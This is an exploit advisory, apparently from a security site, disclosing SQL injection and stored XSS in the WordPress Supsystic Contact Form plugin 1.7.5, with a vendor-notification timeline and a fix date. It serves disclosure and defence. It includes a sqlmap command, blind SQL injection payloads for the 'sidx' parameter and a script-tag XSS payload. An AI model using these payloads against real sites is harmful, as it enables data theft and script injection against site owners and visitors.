WordPress Plugin Supsystic Contact Form 1.7.5 Multiple Vulnerabilities

2021.02.13
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: WordPress Plugin Supsystic Contact Form 1.7.5 - Multiple Vulnerabilities # Date: 24/07/2020 # Exploit Author: Erik David Martin # Vendor Homepage: https://supsystic.com/ # Software Link: https://downloads.wordpress.org/plugin/contact-form-by-supsystic.1.7.5.zip # Version: 1.7.5 # Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2 # 25/07 2020: Vendor notified # 27/07 2020: Vendor requested detailed information # 27/07 2020: Information provided # 07/08 2020: Nudged vendor. No reply # 22/08 2020: Nudged vendor. No reply # 04/10 2020: Nudged vendor. No reply # 29/11 2020: WordPress Plugin Security team contacted # 10/12 2020: Vulnerability fixed ################################## SQLi ################################## # 1. Description The GET parameter "sidx" does not sanitize user input when searching for existing contact forms. # 2. Proof of Concept (PoC) Use ZAP/Burp to capture the web request when searching for existing contact forms and save it to request.txt Referer: http://192.168.0.49/wp-admin/admin.php?page=contact-form-supsystic sqlmap -r request.txt --dbms=mysql -p sidx --level=5 Parameter: sidx (GET) Type: boolean-based blind Payload: mod=forms&action=getListForTbl&pl=cfs&reqType=ajax&search[text_like]=t&_search=false&nd=1595781461778&rows=10&page=1&sidx=(SELECT (CASE WHEN (9602=9602) THEN 0x6964 ELSE (SELECT 9695 UNION SELECT 1181) END))&sord=desc Type: time-based blind Payload: mod=forms&action=getListForTbl&pl=cfs&reqType=ajax&search[text_like]=t&_search=false&nd=1595781461778&rows=10&page=1&sidx=id AND (SELECT 4102 FROM (SELECT(SLEEP(5)))vOKL)&sord=desc ################################## Stored XSS ################################## # 1. Description The "Edit name" and "Contact information" features are vulnerable to stored XXS. Location: http://192.168.0.49/wp-admin/admin.php?page=contact-form-supsystic&tab=forms_edit&id=[FORM ID] # 2. Proof of Concept (PoC) Enter the following payload into the "Edit" field in the top left corner: "><script>alert(1)</script><!--' The payload will execute when viewing the "Show All Forms" section. Referer: http://192.168.0.49/wp-admin/admin.php?page=contact-form-supsystic&tab=forms


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top